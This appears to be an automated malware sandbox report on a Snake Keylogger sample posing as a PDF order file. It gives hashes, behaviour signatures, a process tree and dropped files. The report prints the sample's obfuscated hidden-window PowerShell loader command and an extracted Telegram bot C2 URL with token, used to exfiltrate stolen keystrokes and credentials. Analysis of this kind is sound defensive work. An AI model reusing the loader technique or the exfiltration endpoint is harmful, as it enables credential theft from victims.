Overview

overview

10

Static

static

3

Order&pict...DF.exe

windows7-x64

8

Order&pict...DF.exe

windows10-2004-x64

10

Shoofa.ps1

windows7-x64

3

Shoofa.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    93s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-11-2024 06:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Order&picture sample8398398392838PDF.exe

  • Size

    701KB

  • MD5

    85243ec170323f84e83bd29723bf47ea

  • SHA1

    b3e2f340d0b9d4d5407f82e16990daa0cbe3b18c

  • SHA256

    6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784

  • SHA512

    22843a3a0b24b18346f3a3d9fcfb7c10c23d6efe23879ad78fa08a6652716df6646a6b09f6a6cab774df719fbd865b94f9b97cfde3919c7e8abd2184bb556bf0

  • SSDEEP

    12288:G0mnA1zIjZX7y3mc6zhqCnpAYehgvF1L9IMqr9t3DSDb4Nq:uA1zOy2cQht/ehgd1LXw3ewg

Score
10/10
snakekeyloggerdiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7610532139:AAFiI3HHwFD6pWziyPu3lWJbRKPQtz0nD2c/sendMessage?chat_id=6680692809

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 1 IoCs
  • Snakekeylogger family
    snakekeylogger
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Order&picture sample8398398392838PDF.exe
    "C:\Users\Admin\AppData\Local\Temp\Order&picture sample8398398392838PDF.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Carpetweed=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Shoofa.Rad';$Beskrivelsesrammernes=$Carpetweed.SubString(53953,3);.$Beskrivelsesrammernes($Carpetweed)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4964
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:4808
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 1528
          4⤵
          • Program crash
          PID:4264
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4808 -ip 4808
    1⤵
      PID:5040

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Hyperspiritualisings.Jou4
      Filesize

      353KB

      MD5

      e5ab254bbab53479229977e3f42e1e90

      SHA1

      6a2906bc6b40497a2a2983a0ef5ce86b479bf609

      SHA256

      54dd5a8f87c375d104d34a41087e06068cf103eedf7928f96dac41342a1c8407

      SHA512

      0f77210ef367ec8b7d7e47c14fdc27974c379123601aa21ccd17fe4e2d005bd0d5ec65262a0cc645e7dbef91f6fadf989f68880b52984971452f8c7f9cbccb83

      Download Submit

    • C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Shoofa.Rad
      Filesize

      52KB

      MD5

      bec5624e576379638737b54edd121409

      SHA1

      8bfc71d5fc5bec930fad4dc6e55dadddffc48fdc

      SHA256

      599c9c4648fa3d92c019dc99419cd6e4129d5be92031269d042fca0f16c6ff80

      SHA512

      0ba24ae0bb04460da8459df64b1a91e4bba1fad98028766215eb28e5512a108b8240b6e94f20fabfdeececad40af929c7090e24ac529056901a689f7a1b2bd5f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gckfxwfe.t5z.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/4808-64-0x0000000001200000-0x0000000002454000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4964-24-0x00000000065A0000-0x00000000065BE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4964-63-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-12-0x0000000005EC0000-0x0000000005F26000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4964-45-0x0000000007A10000-0x0000000007A2E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4964-10-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-23-0x0000000005FA0000-0x00000000062F4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4964-6-0x00000000737DE000-0x00000000737DF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4964-25-0x00000000065C0000-0x000000000660C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4964-26-0x0000000007630000-0x00000000076C6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4964-27-0x0000000006A80000-0x0000000006A9A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4964-28-0x0000000006AF0000-0x0000000006B12000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4964-29-0x0000000007C80000-0x0000000008224000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4964-9-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-31-0x00000000088B0000-0x0000000008F2A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4964-32-0x00000000079D0000-0x0000000007A02000-memory.dmp

      Filesize

      200KB

      Download

    • memory/4964-33-0x000000006FC60000-0x000000006FCAC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4964-34-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-35-0x0000000070030000-0x0000000070384000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4964-13-0x0000000005F30000-0x0000000005F96000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4964-11-0x00000000055F0000-0x0000000005612000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4964-48-0x0000000007B40000-0x0000000007B4A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4964-47-0x0000000007A40000-0x0000000007AE3000-memory.dmp

      Filesize

      652KB

      Download

    • memory/4964-50-0x0000000007BB0000-0x0000000007BD4000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4964-49-0x0000000007B80000-0x0000000007BAA000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4964-51-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-53-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-8-0x0000000005820000-0x0000000005E48000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4964-56-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-55-0x00000000737DE000-0x00000000737DF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4964-57-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-58-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-60-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-59-0x0000000008F30000-0x000000000A9D0000-memory.dmp

      Filesize

      26.6MB

      Download

    • memory/4964-61-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-62-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-46-0x00000000737D0000-0x0000000073F80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4964-7-0x0000000002FA0000-0x0000000002FD6000-memory.dmp

      Filesize

      216KB

      Download